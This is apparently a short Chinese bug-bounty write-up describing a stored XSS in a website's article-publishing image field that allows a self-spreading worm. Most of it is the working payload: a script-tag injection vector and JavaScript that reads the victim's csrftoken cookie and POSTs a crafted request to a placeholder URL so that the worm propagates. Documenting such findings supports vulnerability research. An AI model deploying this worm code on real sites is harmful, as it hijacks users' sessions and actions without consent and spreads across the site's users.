layout: post
title: 7. xss蠕虫
category: SRC
tags: SRC
keywords: SRC,XSS
前言
该篇记录为记录实际的src过程第7篇小文章,内容为某网站的xss蠕虫。
XSS特征
触发点惊奇的出现在发送文章中,插入图片的地方可以执行js,由于是发布文章(真的没有想到现在还能这种洞,所以说不能自以为然),所以可以造成蠕虫。如下漏洞和代码都是队友林百万
所为,之前没有用过,特此记录一下。可蠕虫的存储型xss,属于高危害。
蠕虫代码
可以直接插入<script/src=//your.js>
内容
//页面存在csrf_token,可以直接利用xss获取cookie中的token值
function getCookie(name) {
var strcookie = document.cookie;//获取cookie字符串
var arrcookie = strcookie.split("; ");//分割
//遍历匹配
for (var i = 0; i < arrcookie.length; i++) {
var arr = arrcookie[i].split("=");
if (arr[0] == name) {
return arr[1];
}
}
return "";
};
var params = {你要发送的数据包};
params['csrftoken'] = getCookie("csrftoken");
url = "https://xxxx";
fetch(url, {
method: 'POST',
mode: 'cors',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(params)
});
后话
xxxx